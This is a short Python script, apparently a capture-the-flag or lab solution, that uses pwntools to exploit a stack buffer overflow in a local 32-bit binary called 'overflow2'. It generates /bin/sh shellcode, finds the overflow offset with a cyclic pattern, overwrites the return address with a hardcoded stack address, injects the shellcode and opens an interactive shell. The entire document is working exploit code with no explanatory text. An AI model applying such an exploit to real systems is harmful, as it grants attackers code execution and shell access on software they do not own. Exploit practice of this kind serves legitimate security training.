from pwn import *

context.update(arch='i386', os='linux')

shellcode = shellcraft.sh()
print(shellcode)
print(hexdump(asm(shellcode)))


p = process("./overflow2")

payload = cyclic(cyclic_find(0x61716161))
payload += p32(0xffffd500)
payload += asm(shellcode)




p.sendline(payload)

p.interactive()
